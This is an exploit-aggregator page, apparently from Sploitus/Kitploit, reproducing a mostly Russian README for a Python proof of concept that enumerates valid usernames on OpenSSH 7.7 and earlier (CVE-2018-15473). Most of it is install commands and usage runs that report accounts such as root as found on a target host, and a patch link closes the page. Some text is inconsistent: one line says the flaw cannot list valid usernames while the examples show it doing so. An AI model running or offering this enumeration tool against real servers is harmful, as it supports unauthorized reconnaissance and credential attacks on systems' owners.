Sploitus

Exploit for CVE-2018-15473 CVE-2018-15473 CVE-2018-15919

kitploit · 2026-08-25

Exploit Code

MARKDOWN84 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-1STPEAK-CVE-2018-15473
## CVE-2018-15473

## Причина

Сервер OpenSSH не задерживает обработку пользователя с недействительной аутентификацией до полного разбора пакета, содержащего запрос. Эта уязвимость связана с файлами auth2-gss.c, auth2-hostbased.c, auth2-pubkey.c.

## Использование

Хотя эту уязвимость нельзя использовать для создания списка действительных имен пользователей, её всё же можно применять для перебора и угадывания имен пользователей.

## Затронутые версии

OpenSSH <= 7.7

## Незатронутые версии

openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27

## Установка PoC

Возможно, вам потребуется установить эквивалентный пакет `openssl-dev` для вашего дистрибутива.

root@kitploit:~
    
    
    # 注意:如果您在kali上安装,则可以跳过pip安装,只需执行下面第一二三行的步骤,因为paramiko已经存在。 
    git clone https://github.com/1stPeak/CVE-2018-15473.git
    cd CVE-2018-15473
    chmod u+x ssh-username-enum.py
    pip install -r requirements.txt 
    # 或者使用以下命令下载安装 
    pipenv install -r requirements.txt  # if you're cool like that   
    chmod u+x ssh-username-enum.py
    

## Примеры использования

Пример 1: Перебор одного пользователя

root@kitploit:~
    
    
    peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
    [+] root found!
    

Пример 2: Перебор нескольких пользователей с использованием 10 потоков (по умолчанию 4)

root@kitploit:~
    
    
    peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
    [+] man found!
    [+] guest found!
    [+] nobody found!
    [!] SSH negotiation failed for user nobody4.
    [+] lpadmin found!
    и т.д.
    

Пример 3: IPv6-адрес с указанием порта SSH

root@kitploit:~
    
    
    peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
    [+] ROOT found!
    [+] syslog found!
    [+] sslh found!
    [!] SSH negotiation failed for user sssd.
    [+] rfindd found!
    [+] ultra found!
    и т.д.
    

## Решение

Рекомендуется обновиться до незатронутой версии. Проект OpenBSD опубликовал исправление исходного кода по следующей ссылке: https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0

## Ссылки

https://github.com/epi052/cve-2018-15473  
http://blog.nsfocus.net/openssh-cve-2018-15919/